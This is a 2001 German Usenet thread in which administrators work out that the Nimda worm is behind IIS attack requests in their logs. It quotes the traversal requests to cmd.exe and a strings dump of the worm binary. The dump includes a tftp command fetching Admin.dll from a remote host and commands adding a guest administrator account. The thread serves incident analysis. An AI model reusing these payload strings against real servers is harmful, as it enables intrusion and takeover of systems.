xxx.sv.nl - - [18/Sep/2001:14:47:25 +0000] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 302 394
xxx.sv.nl - - [18/Sep/2001:14:47:49 +0000] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 302 392
xxx.sv.nl - - [18/Sep/2001:14:47:50 +0000] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 402
xxx.sv.nl - - [18/Sep/2001:14:47:54 +0000] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 402
xxx.sv.nl - - [18/Sep/2001:14:47:54 +0000] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 416
xxx.sv.nl - - [18/Sep/2001:14:47:58 +0000] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 433
xxx.sv.nl - - [18/Sep/2001:14:48:03 +0000] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 433
Es scheint, dass dieser den gleichen Fehler nutzt wie die Vorgänger,
irgendwie fehlt aber der Bufferoverflow.
Weiss jemand mehr darüber? Vielen Dank!
Bruno
Das ist kein Code Red.
Da versucht jemand, die Hintertuer, die Code Red hinterlaesst,
auszunutzen. Wenn ein GET /scripts/root.exe?/c+dir klappt, dann
klappt vermutlich auch jedes andere, ggf. boesartige Kommando.....
Hau' dem Absender auf die Finger. Sowas macht man nicht.
--
Cheers,
haj
> Seite heute 15 Uhr müllen mir diverse Server das Logfile meines Webservers
> zu (alle nach dem gleichen Schema), z.B.:
>
> xxx.sv.nl - - [18/Sep/2001:14:47:25 +0000] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 302 394
[Log gesnipt]
>
> Es scheint, dass dieser den gleichen Fehler nutzt wie die Vorgänger,
> irgendwie fehlt aber der Bufferoverflow.
> Weiss jemand mehr darüber? Vielen Dank!
>
> Bruno
>
Das würde mich auch interresieren; bei mir kommen seit ca 15.00 Uhr auch
alle ein bis zwei Minuten Anfragen auf Port 80. Der Port (Dienst auf dem
Port) ist jedoch für die Aussenwelt nicht erreichbar. Die anfragenden
Rechner scheinen nach Stichproben immer Win NT/2000 Rechner zu sein.
Die Anfragen kommen alle aus meinem Subnet (T-Online Dial-Up 217.0.x.x).
Gruß
Jochen
--
Forgive, but never forget!
> Hier versucht jemand, Backdoors, die von CodeRed(II) eingerichtet
> worden sind, zu finden.
Scheint aber doch sowas, wie ein Wurm zu sein, offenbar einer, der
den IIS infiziert. Zumindest haengt hinter jeder IP, von der aus
die Eintraege in meinem Log stammen ein IIS, und die Source-IPs
sind immer andere, allerdings alle aus meinem /8er Subnetz.
--
Horst Laschinsky
Universitaet Erlangen-Nuernberg Institut fuer Theoretische Physik III
Staudtstr. 7 - Room: 02.706 - 91058 Erlangen/Germany - Phon: +49 9131 85-28476
http://theorie3.physik.uni-erlangen.de/~htlaschi
> Das ist kein Code Red.
CodeRed nicht. Aber...
> Da versucht jemand, die Hintertuer, die Code Red hinterlaesst,
> auszunutzen.
Das kann auch nicht sein. Denn dazu ist die Intensität viel zu hoch -
ich habe jetzt innerhalb von drei Stunden fast soviele Ursprungs-IPs
festgestellt wie am ersten Tag von CRII. Und auf Incidents haben mehrere
Leute das Muster auch schon gepostet. D.h. da ist der nächste Worm
unterwegs...
Sevo
Harald Joerg wrote:
<snip>
> Das ist kein Code Red.
>
> Da versucht jemand, die Hintertuer, die Code Red hinterlaesst,
> auszunutzen. Wenn ein GET /scripts/root.exe?/c+dir klappt, dann
> klappt vermutlich auch jedes andere, ggf. boesartige Kommando.....
>
> Hau' dem Absender auf die Finger. Sowas macht man nicht.
Ne, das ist automatisiert. Die Tatsache, dass es flächenbrandmässig auftritt
deutet auf einen weiteren Wurm hin (der wars. die Backdoors der Codered
nutzt). Ich bin etwas auf den angreifenden Systemen "rumgesurft"... sie sind
offenbar selber befallen (hab da ein Perl Script das mir quasi eine Shell
auf dem System gibt. Es setzt die einzelnen GET Anfragen in einen
Zusammenhang, so dass man quasi wie bei einer Telnet-Sitzung kontinuierlich
arbeiten kann).
Ich habe langsam echt die Nase voll, dieser Wurm (oder was auch immer)
füllt das Logfile mit der zehnfachen Menge an Müll wie der CodeRed.
*nerv*
Bruno
> Ne, das ist automatisiert. Die Tatsache, dass es fl?chenbrandm?ssig auftritt
> deutet auf einen weiteren Wurm hin (der wars. die Backdoors der Codered
Wenn man die Source-IP in nen Browser eintippt, erscheint eine Web-
seite (oftmals anscheinend die IIS-Standardseite), von der der
Browser dann eine Datei Namens readme.eml runterladen will, die
offenbar Binaercode enthaelt. Bin grad dabei, zu untersuchen, was
das soll.
Hi!
> Browser dann eine Datei Namens readme.eml runterladen will, die
> offenbar Binaercode enthaelt. Bin grad dabei, zu untersuchen, was
> das soll.
Ich habs mal unter test.eml gespeichert.
me@la-bestia:~ > uudeview test.eml
Loaded from test.eml: '' (readme.exe): readme.exe part 1 Base64
Warning: Boundary expected on Multipart message but found EOF
Found 'readme.exe' State 16 Base64 Parts 1 OK
-rw-r--r-- readme.exe is OK [d] (?=help) d
File successfully written to /home/doppel-r/readme.exe
1 file decoded from 1 input file, 0 failed
me@la-bestia:~ >
Wird also ein exe-File. Was das tut? *schulterzuck*
Doppel-R
--
|-----Suzuki GSX-R 750 2001------------------Gilera FXR 1xx Runner-----|
|--Ich will keine Diskussion, ob der Gixxer besser is, als La-Bestia.--|
|-------"DEPPATA!... Des gheat so!" -- W.(C). afm-ST am 24.10.98-------|
PIP #853 http://www.afm.at/doppel-r/RR.jpg http://www.usenet.at RRR #853
> Weiss jemand mehr darüber? Vielen Dank!
http://www.datadellows.com/v-descs/nimda.shtml
ist wohl der Übeltäter.
IIS - Durch diese hohle Gasse wird er kommen :->
Bis denne
Jens
> Found 'readme.exe' State 16 Base64 Parts 1 OK
> [...]
> Wird also ein exe-File. Was das tut? *schulterzuck*
htlaschi@platon:~$ strings readme.exe | less
liefert unter anderem folgendes:
==========
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000"
)</script></html>
/Admin.dll
GET %s HTTP/1.0
============
Hab grad kein Windows da, um's zu testen, aber ich vermute mal, das
ist das Teil, dass sich dann auf der Kiste einnistet und versucht,
weitere hosts im gleichen 8er-Subnetz zu connecten/infizieren.
Ciao,
Horst
Ich habe nicht sagen wollen, dass der "jemand" *von Hand* arbeitet.
Aber irgendwie war doch damit zu rechnen, dass frueher oder spaeter
jemand die "Ernte" von Code Red einfahren wollen wuerde - das muss ja
noch nicht mal der Code Red-Autor sein.
Das, was da jetzt umherspukt, sollte aber wenigstens "empfindlicher" auf
die (beim eigentlichen Code Red voellig wirkungslosen) Bremsversuche
durch laaaangsame Lieferung einer HTTP-Response reagieren. Wenn der
Angriff nicht bloss ein dummer Scherz ist, dann will der Angreifer
wissen, ob ein 200er-Ergebnis kommt und wird drauf warten.
--
Cheers,
haj
Für Sophos-Benutzer gibts schon 'ne aktual. Sig.
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Bis denne
Jens
>http://www.datadellows.com/v-descs/nimda.shtml
Aus readme.exe:
--- cut ---
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
[..]
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
[..]
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
[..]
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
[..]
MAPISendMail
[..]
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
[..]
Content-ID: <EA4DMGBP9p>
[..]
\load.exe
\mmc.exe
\readme*.exe
\readme.eml
\riched20.dll
\system.ini
\wininit.ini
[..]
--- cut ---
Gruss,
Matthias
--
Vermutlich wird die positive Wirkung von Werbung im usenet seitens der
Werbenden ohnehin hoffnungslos überschätzt. Was im Kino durchaus noch
erwünscht, im Fensehen als Gelegenheit zum Pinkeln benutzt, wird im
usenet eben mit Bots bekämpft. Markus Luft in de.admin.net-abuse.news
> Das kann auch nicht sein. Denn dazu ist die Intensität viel zu hoch -
> ich habe jetzt innerhalb von drei Stunden fast soviele Ursprungs-IPs
> festgestellt wie am ersten Tag von CRII. Und auf Incidents haben mehrere
> Leute das Muster auch schon gepostet. D.h. da ist der nächste Worm
> unterwegs...
Habe ich auch als Verdacht: wie schon gepostet alles aus dem 217/8 Netz -
hostanfragen liefern aber auch andere Anbieter als T-Online (Frankreich,
z.B.); dafür dass das erst heute seit 15-16 Uhr rumnervt, ist das aber ganz
schön wet verbreitet - das spricht eigentlich tatsächlich dafür, dass eine
zuvor geschaffene Backdoor ausgenutzt wird. Übrigens liefert ein grep
/winnt/ /var/log/httpd/access_log -c bei mir seit 15:56 1123 Einträge - das
hat CodeRed in allen Varianten nicht seit Juli hinbekommen... und ich bin
eigentlich nur per DSL-Flat drin, normalerweise habe ich gar keinen
eingehenden Traffic, bis auf das übliche "Hintergrundrauschen".
Gruß,
Stefan
Nein. Es ist vermutlich aehnlich effizient wie CR2 programmiert,
aber ohne eine nicht optimierte Release1 zur Warnung.
(OK, CR1+2 haetten da reichen sollen, aber die Idioten sterben nicht
aus....)
>ich habe jetzt innerhalb von drei Stunden fast soviele Ursprungs-IPs
>festgestellt wie am ersten Tag von CRII. Und auf Incidents haben mehrere
>Leute das Muster auch schon gepostet. D.h. da ist der nächste Worm
>unterwegs...
~490 Zugriffe von 25 verschiedenen Hosts. Morgen mal die Teergruben
anpassen.
Gruss,
Harald
--
Failure is not an option. It comes bundled with your Microsoft product.
(Ferenc Mantfeld)
> Habe ich auch als Verdacht: wie schon gepostet alles aus dem 217/8
> Netz - hostanfragen liefern aber auch andere Anbieter als T-Online
> (Frankreich, z.B.);
Hier läuft mir auch das Log voll, aber (bislang noch) kommen alle
Anfragen aus dem 'nahen' Netz der Uni. Sieht also so aus als würde
der wirklich erst das lokale Netz abgrasen.
> dafür dass das erst heute seit 15-16 Uhr rumnervt, ist das aber ganz
> schön wet verbreitet - das spricht eigentlich tatsächlich dafür,
> dass eine zuvor geschaffene Backdoor ausgenutzt wird. Übrigens
> liefert ein grep /winnt/ /var/log/httpd/access_log -c bei mir seit
> 15:56 1123 Einträge - das hat CodeRed in allen Varianten nicht seit
> Juli hinbekommen...
dito hier (1130). default.id kommt gerade mal auf 762 seit Aug 1
Dieses readme.exe (mit strings angeschaut) zeigt schon ein paar
interessante Sachen:
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
usw....
Pit
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dr. Peter "Pit" Suetterlin http://www.astro.uu.nl/~suetter
Sterrenkundig Instituut Utrecht
Tel.: +31 (0)30 253 5225 P.Suet...@astro.uu.nl
__________________________________________________________________________
> * Horst Laschinsky <htla...@theorie3.physik.uni-erlangen.de> schrieb:
> > htlaschi@platon:~$ strings readme.exe | less
> > liefert unter anderem folgendes:
> [...]
> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
Ist das dieses "Code Blue"-Dings, was neulich mal auf heise
erwaehnt war?
Gruss Urs...
--
Widerlich, adj. - Eigenart fremder Meinungen
Ambrose Bierce, Des Teufels Woerterbuch
Peter Suetterlin <p...@phys.uu.nl> wrote:
> Hier läuft mir auch das Log voll, aber (bislang noch) kommen alle
> Anfragen aus dem 'nahen' Netz der Uni. Sieht also so aus als würde
> der wirklich erst das lokale Netz abgrasen.
Hier (uni-hannover) laufen seit 15:33 die ersten Meldungen auf. Seit dem
gabs 1246 Eintraege ins Log. Das scheint kein Scriptkiddie zu sein, sieht
nach was automatischem, sich selbst verbreitendem aus.
gruesse
stefan
> Ich habe hier auch noch einen Link:
> http://slashdot.org/articles/01/09/18/151203.shtml
Na da ist die Kacke aber wirklich am Dampfen. Das ist gar nicht IIS
spezifisch, so wie es aussieht.
Zitat: Update Web servers compromised by this worm apparently
attach a "readme.eml" to all web pages served... and due to a bug
in IE5, it will automatically execute the file! Yay Internet
Explorer!
Unlustig.
Jens Wilke <J.W...@wiso.uni-dortmund.de> wrote:
> http://www.datadellows.com/v-descs/nimda.shtml
> ist wohl der Übeltäter.
Jetzt frage ich mich nur noch, wer so daemlich sein kann und eine .exe
Datei oeffnet.
OK, ok, ich kanns mir denken.
gruesse
stefan
> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
http://www.heise.de/newsticker/data/pab-18.09.01-000/
Michael H. Fischer
--
http://www.derfisch.de/ntminifaq.htm
http://www.derfisch.de/ntfree.htm
http://www.derfisch.de/ntlinks.html
>~490 Zugriffe von 25 verschiedenen Hosts. Morgen mal die Teergruben
>anpassen.
23 Hosts, 868 Requess -- manche Hosts kommen mehrfach, siehe [1]
Gruss,
Matthias
Bei uns auch und laut Bugtraq ueberall...
Neben den obigen Vulnerabilities testet der Wurm (ist es wohl) IIRC auch
auf einige CodeRedII-`Freigaben'.
Wobei ein `dir c:' nicht so gefaehrlich sein sollte. Weiss schon jemand,
was passiert wenn es einen verwundbaren IIS trifft?
MfG
Martin
--
PGP/GPG encrypted mail preferred, see header
,--
| Nur tote Fische schwimmen mit dem Strom
`--
> was passiert wenn es einen verwundbaren IIS trifft?
Wir haben den derzeitgen Stand der Erkenntnis (anderer)
zusammengefaßt:
http://cert.uni-stuttgart.de/ticker/article.php?mid=480
Gewisse syntaktische Unzulänglichkeiten bitte ignorieren.
On 18 Sep 2001 17:43:35 GMT Peter Suetterlin <p...@phys.uu.nl> wrote:
> Hier läuft mir auch das Log voll, aber (bislang noch) kommen alle
> Anfragen aus dem 'nahen' Netz der Uni. Sieht also so aus als würde
> der wirklich erst das lokale Netz abgrasen.
Ersetze "erst" durch "vorwiegend", nach meinen Beobachtungen.
>> Übrigens liefert ein grep /winnt/ /var/log/httpd/access_log -c bei
>> mir seit 15:56 1123 Einträge - das hat CodeRed in allen Varianten
>> nicht seit Juli hinbekommen...
> dito hier (1130). default.id kommt gerade mal auf 762 seit Aug 1
Ich habe mir einmal einen meiner Server angesehen, auf dem ca. 60
verschiedene vhosts mit eigener IP laufen (alle im gleichen /24er
Block). Was mich verbluefft, ist folgendes (Zahlen sind fuer die
Zugriffe der letzten zwei Stunden):
| $ grep -c "/winnt/" */*www_access* |cut -d: -f2 |sort -n |tail -10
| 338
| 350
| 350
| 355
| 357
| 379
| 387
| 574
| 793
| 1273
Die am schwaechsten betroffenen IP-Adresse hat 112 Treffer, der Schnitt
liegt bei ca. 250, schaetze ich. Ob da der Zufallsgenerator seinen Namen
nicht ganz verdient? Auf keinen Fall korellieren die Werte irgendwie mit
Bekanntheit der Domain, Zugriffszahlen oder der Anzahl der auf die
gehostete Domain zeigenden Links.
Servus,
Stefan
PS: urgs. Der Wert fuer die am meisten betroffene Domain ist inzwischen
schon auf 1315, nur waehrend der paar Zeilen
--
Stefan - die schrecklichste Steigerung von leis!
http://www.sloganizer.de/
"Würmer", "Viren"... Man könnte die doch auch "Antikörper" nennen, das
Internet wehrt sich gegen die Invasion durch Millionen von Winlusern.
Und dabei kommt es eben auch zu Fieber und Entzündungen (= anwachsende
Logfiles auf eigentlich "gesunden" Webservern).
SCNR, Andreas
PS: Bitte Smilies an geeigneten Stellen einstreuen ;-)
--
Andreas Ferber - dev/consulting GmbH - Bielefeld, FRG
---------------------------------------------------------
+49 521 1365800 - a...@devcon.net - www.devcon.net
> PS: urgs. Der Wert fuer die am meisten betroffene Domain ist inzwischen
> schon auf 1315, nur waehrend der paar Zeilen
Ich habe gerade nur mal die Logs der Apaches unserer User-
Homepages durchgeschaut:
Bis jetzt schon über 1.000.000 Requests durch W32.Nimda.A@mm.
> Jetzt frage ich mich nur noch, wer so daemlich sein kann und eine .exe
> Datei oeffnet.
Bei diesem Wurm musst Du das gar nicht, so wie es aussieht. Das
macht OE oder der IE ganz fuer Dich allein.
Sprich, wer auf eine Webseite mit infiziertem Webserver kommt und
Javaskript in seinem IE anhat, kriegt ihn. Wer ihn als Mail bekommt
und einen ungepatchten OE (manche Versionen) nutzt, kriegt ihn.
Und _das_ ist wirklich hart.
Es werden *höchstwahrscheinlich* auch voll gepatchte und vorher nicht
infizierte IIS befallen. Außerdem ist ja inzwischen die IE-Lücke (auch
v5.5 ist betroffen, einen PC haben wir schon abgeklemmt) bekannt, die
auch ohne eigenes Zutun (bitte wer hat schon Javascript
ausgeschaltet?) funkt.
Übrigens fragt Netscape - zum Glück *noch* -, ob die Anwendung
ausgeführt werden soll, es ist also nur eine Frage der Zeit, daß auch
Opera, Netscape und Co. betroffen sein werden.
Also nicht hämisch werden, lieber die eigenen Systeme scannen und bei
Befund direkt von CD neu installieren.
Ich denke, da wird noch einiges auf uns zukommen...
Bis denne
Jens
Jens Wilke <J.W...@wiso.uni-dortmund.de> wrote:
> Nachtrag, der 2te,
> Es werden *höchstwahrscheinlich* auch voll gepatchte und vorher nicht
> infizierte IIS befallen.
Warum?
> Außerdem ist ja inzwischen die IE-Lücke (auch
> v5.5 ist betroffen, einen PC haben wir schon abgeklemmt) bekannt, die
> auch ohne eigenes Zutun (bitte wer hat schon Javascript
> ausgeschaltet?) funkt.
Auf einem Server (auf Workstations hat der IIS nichts zu suchen) sollte man
IMHO tunlichst alles unterlassen, was die Sicherheit gefaehrdet. Im Internet
zu surfen oder Mails mit Outlook zu lesen gehoert eindeutig in diese
Kategorie.
> Übrigens fragt Netscape - zum Glück *noch* -, ob die Anwendung
> ausgeführt werden soll, es ist also nur eine Frage der Zeit, daß auch
> Opera, Netscape und Co. betroffen sein werden.
Nur solange $LUSER das nicht abschaltet.
> Also nicht hämisch werden, lieber die eigenen Systeme scannen und bei
> Befund direkt von CD neu installieren.
Tolle Idee. Du hast nur vergessen, dass Du waehrend der Installation die
Netzwerkverbindung trennst und zwar so lange, bis Du alle Service Packs und
Patches installiert hast. Viel Spass dass Deinem Arbeitgeber zu verklickern
(Sorry Boss, aber www.$FIRMENNAME.de ist fuer 5 Stunden Offline). Da moechte
ich nicht in Deiner Haut stecken :-)
> Ich denke, da wird noch einiges auf uns zukommen...
Ja, grosse Logfiles bei allen Apache Servern. Die anderen muessen ja
regelmaessig neu installiert werden :-]
gruesse
stefan
> Seite heute 15 Uhr müllen mir diverse Server das Logfile meines Webservers
> zu (alle nach dem gleichen Schema), z.B.:
Schlug hier auch ein, u.A.:
216.217.224.135 - - [19/Sep/2001:12:12:44 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
(allerdings nicht mit dem IE). :-)
Johann
--
Du versuchst die kriminellen Handlungen zu verniedlichen und mich
persönlich zu beleidigen?
(Das Merlin in <9hn9pt897tfjnu5sd...@4ax.com>)
Autsch!! "Speichern der Datei readme.eml unter?", kam hier (NS4.75). Kann
denn Bill so doof sein, dass nicht mal die eigenen Patches auf den eigenen
Websites implementiert sind?
--
MfG Helmar
GSM-Roaming mit Preisen weltweit und Infos zu Interkom mit
Einstieg zum Viag-Diskussionsforum bei eGroups
http://www.generic-link.de/ + http://www.roamingpartner.de/
>> Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
>> (allerdings nicht mit dem IE). :-)
> Autsch!! "Speichern der Datei readme.eml unter?", kam hier
> (NS4.75). Kann denn Bill so doof sein, dass nicht mal die eigenen
> Patches auf den eigenen Websites implementiert sind?
Nee, das ist irgend 'ne Default-Installation (da wird ja der Webserver
automatisch aktiviert) und kein MS-eigener Rechner.
Aber kannst ja mal 'seine' Sites abklappern - vielleicht hat's schon
einen erwischt....
(3):[oliver@behemoth][~] whois -a 216.217.224.135
Warning: RIPE flags ignored for a traditional server.
@Home Network / @Work Division (NETBLK-ATWORK-6)
425 Broadway
Redwood City, CA 94063
US
Netname: ATWORK-6
Netblock: 216.216.0.0 - 216.217.255.255
Maintainer: WORK
Coordinator:
Operations, Network (HOME-NOC-ARIN) noc-...@noc.home.net
(650) 556-5599
Domain System inverse mapping provided by:
NS1.HOME.NET 24.0.0.27
NS2.HOME.NET 24.2.0.27
ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
Record last updated on 17-Sep-1999.
Database last updated on 18-Sep-2001 23:14:24 EDT.
The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.
Schaut eher nach @home als nach M$ aus. Obwohl der Link natürlich
genial ist. (Achja, wg. Patches: War da nicht was mit Hotmail und CR?
Hehehe.)
baba,
o.
--
begin yvkBpjen.exe
YU7ebL3t6F8wOmfvK+grD+nNTvO6oN0lTu/K7fmDUG9+0azWZ5
Rf2Tq9EeGAP2TetowwAtqoZQG8/BdMQF12fANyqi5O8lbDKveS
end
Hi,
Microsoft hat andere Adressen:
Netname: MICROSOFT-GLOBAL-NET
Netblock: 207.46.0.0 - 207.46.255.255
Uli
--
Ulrich Eckhardt Tr@nscom
http://www.uli-eckhardt.de http://www.transcom.de
Lagerstraße 11-15 A8
64807 Dieburg Germany
> 216.217.224.135 - - [19/Sep/2001:12:12:44 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
>
> Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
joe@comm:~ > whois -h whois.thur.de 216.217.224.135
Process query: '216.217.224.135'
Query recognized as IP.
Querying whois.arin.net:43 with whois.
@Home Network / @Work Division (NETBLK-ATWORK-6)
425 Broadway
Redwood City, CA 94063
US
Netname: ATWORK-6
Netblock: 216.216.0.0 - 216.217.255.255
[...]
Und? Ein ISP.
> (allerdings nicht mit dem IE). :-)
Wieso nicht?
-> Skripte sind normalerweise sicher. Soll die Ausführung von Skripten
zugelassen werden?
-> Aber ja doch!
-> Taskleiste: Error: The requested...
-> Ansicht - Quelltext anzeigen
Na ja. Ein infizierter IIS. Ist ja z.Zt. nichts besonderes.
Also:
1. Nicht jede Default IIS Startseite liegt auf einem MS Server (eher die
wenigsten)
2. Auch mit dem IE darf man
Joe
> > Es werden *höchstwahrscheinlich* auch voll gepatchte und vorher nicht
> > infizierte IIS befallen.
>
> Warum?
Weil ein Server (nicht bei uns) befallen wurde, der gepatcht/sauber
war, deshalb auch *höchstwahrscheinlich*, da aus 2ter Hand.
> > Außerdem ist ja inzwischen die IE-Lücke (auch
> > v5.5 ist betroffen, einen PC haben wir schon abgeklemmt) bekannt, die
> > auch ohne eigenes Zutun (bitte wer hat schon Javascript
> > ausgeschaltet?) funkt.
>
> Auf einem Server (auf Workstations hat der IIS nichts zu suchen) sollte man
> IMHO tunlichst alles unterlassen, was die Sicherheit gefaehrdet. Im Internet
> zu surfen oder Mails mit Outlook zu lesen gehoert eindeutig in diese
> Kategorie.
Ah ja, ich hätte das etwas deutlicher trennen sollen.
Ich gehe normalerweise davon aus, daß in dieser NG niemand - OK, die
meisten - einen Server zum Spaß aufsetzen.
Wir haben keine W2k/IIS-Server, der infizierte Rechner ist eine
W98-Workstation mit IE 5.5 (benutzt, trotz vorhandenem NS) und wurde
abgeklemmt, bis das System neuinstalliert ist.
> Nur solange $LUSER das nicht abschaltet.
Na Logo...
> > Also nicht hämisch werden, lieber die eigenen Systeme scannen und bei
> > Befund direkt von CD neu installieren.
>
> Tolle Idee. Du hast nur vergessen, dass Du waehrend der Installation die
> Netzwerkverbindung trennst und zwar so lange, bis Du alle Service Packs und
> Patches installiert hast. Viel Spass dass Deinem Arbeitgeber zu verklickern
> (Sorry Boss, aber www.$FIRMENNAME.de ist fuer 5 Stunden Offline). Da moechte
> ich nicht in Deiner Haut stecken :-)
Und wo liegt das Problem? Du steckst nicht in meiner Haut :-)
Aber erkläre uns doch bitte, wie DU den Virus entfernst, ohne
Neuinstallation. Wartest Du auf das Tool/Scanner und nimmst den Server
solange vom Netz - was sagt dein Chef wohl DAZU? Oder entfernst Du ihn
von Hand? Dann kannst Du uns ja mal deine Analyse des Virus zukommen
lassen. Oder lässt Du ihn weiterlaufen? Dann wird sich dein Chef
früher oder später genauso freuen.
> > Ich denke, da wird noch einiges auf uns zukommen...
>
> Ja, grosse Logfiles bei allen Apache Servern. Die anderen muessen ja
> regelmaessig neu installiert werden :-]
Übung macht den Meister ;)
Bis denne
Jens
...war er unter Umständen selber schuld.
Wenn ich z.B. mal von mir ausgehe, dann weiss ich solche Dinge wie:
patche und wo ich sie herbekomme
mechanismen im webserver
mechanismen zur Auth.
NEtzwerkdinge (also wege, abläufe, kausale zusammenhänge u.Ä.)
nur aus dem Netz. Ich bin hier der einzige UNIXer, niemand da, der mir
was beibringen könnte. Wenn ich nach Lehrgängen frage, ist grad keien
Zeit, wenn ich dinge vorchlage, entscheidet der Chef (der KEIN Admin
ist) ob wirs machen oder nicht.
Die Zeiten, in denen der Admin als Fachmann tatsächlich ncoh Einfluss
hatte, gehen langsam vorbei. Inzwischen ist der Admin nur noch ein
Dienstleister, der tut, was gesagt wird.
Wenn z.B. ein Admin vorschlägt, die eminent wichtigen websites doch
besser auf UNIX/Apache laufen zu lassen, udn der Chef das ablehnt ("Wir
benutzen MS-Software, weil eine richtige Firma nciht mit solchen
Freakkram wie LINUX arbeitet"), dann kann der ADMIN gar nix machen.
Aik Richter
Wer, von den Admins, die ein www.$FIRMENNAME.de, bei dem es schlimm ist, wenn
der Server fuer 5 Stunden ausfaellt, hat freiwillig IIS installiert?
Und wenn man den nicht freiwillig installiert hat, kann man ja zum Lart
uebergehen: "Wegen einiger Fehlentscheidungen von $ENTSCHEIDER hatte ich
leider die Aufgabe, IIS auf NT zu installieren, fuer welchen immer wieder
Sicherheitsluecken auftauchen. Dieses ist mal wieder so eine. $BLAH"...
>> Ich denke, da wird noch einiges auf uns zukommen...
> Ja, grosse Logfiles bei allen Apache Servern. Die anderen muessen ja
> regelmaessig neu installiert werden :-]
Nein.
Nur IIS muss neu installiert werden.
Und nicht nur die Apaches, mein Publicfile erzeugt auch schon verdaechtig
grosse logs...
FaUl
end
This article does not support incompatible and broken newsreader.
--
SIGSIG (core dumped)
No signature left on device...
Und?
Was soll an athm-216-217-xxx-135.home.net interessant sein? Vermutlich ist
das die IIS-Standardseite, wenn man nichts darauf veroeffentlicht.
[Text]
Habt ja Recht, ich dachte, das wäre `ne MS-Seite.
F'up2poster.
> Die anfragenden Rechner scheinen ...immer Win NT/2000 Rechner zu sein.
> Die Anfragen kommen alle aus meinem Subnet (T-Online Dial-Up 217.0.x.x).
Was machen Win2000-Server mit Dial-Up-Verbindungen?
kratzt sich am Kopf
Die meisten Code-Red- und jetzt auch Nimda-Attacken kommen von
DSL-dynamic-IPs.
Gruß
Wolfgang
Das nennt man Komfort. Jetzt muß man nicht einmal mehr selber klicken
um sich einen Wurm einzufangen.
> Und _das_ ist wirklich hart.
Nein das ist eine gerechte Strafe für die Unfähigen.
bye Gerhard
--
If you have to ask what jazz is, you'll never know.
-- Louis Armstrong
Nun mit Code Red hatte es ja sogar geklappt. IIRC hat es sogar den
Webserver mit den Patches für den selbigen erwischt.
Bedauerlicherweise ziemlich viele.
Grüße
Marc
--
-------------------------------------- !! No courtesy copies, please !! -----
Marc Haber | " Questions are the | Mailadresse im Header
Karlsruhe, Germany | Beginning of Wisdom " | Fon: *49 721 966 32 15
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fax: *49 721 966 31 29
:),ja ist tragisch.
> Damit es nicht zu Karriereknicken kommt, empfehle ich, zweifelhafte
> Aufträge schriftlich bestätigen zu lassen und ggf. (Akten-)Notizen
> anzufertigen.
unglücklicherweise hab ich ne Papierallergie. Allerdings hab ich
ähnliches trotz allem in Planung.
>
>>Wenn z.B. ein Admin vorschlägt, die eminent wichtigen websites doch
>>besser auf UNIX/Apache laufen zu lassen, udn der Chef das ablehnt
>>("Wir benutzen MS-Software, weil eine richtige Firma nciht mit
>>solchen Freakkram wie LINUX arbeitet"), dann kann der ADMIN gar nix
>>machen.
>>
>
> Doch, kündigen.
Derzeit muss ich MIete zahlen und kann deshalb keine Risiken eingehen.
Also werd ich mich "geduldig" erweisen, jedoch ncht blöde :-)
AiK Richter
>> Aber kannst ja mal 'seine' Sites abklappern - vielleicht hat's schon
>> einen erwischt....
> Nun mit Code Red hatte es ja sogar geklappt. IIRC hat es sogar den
> Webserver mit den Patches für den selbigen erwischt.
Laut Posting im Heise-Ticker: www.microsoft.com/frontpage/ ....
> Aber kannst ja mal 'seine' Sites abklappern - vielleicht hat's schon
> einen erwischt....
Na sowas :->
http://www.theinquirer.net/200901203.htm
"...have been infected by the bug..."
Erkennt den schon irgendein Bugscanner? *g*
Bis denne
Jens
> >Wer, von den Admins, die ein www.$FIRMENNAME.de, bei dem es schlimm ist, wenn
> >der Server fuer 5 Stunden ausfaellt, hat freiwillig IIS installiert?
>
> Bedauerlicherweise ziemlich viele.
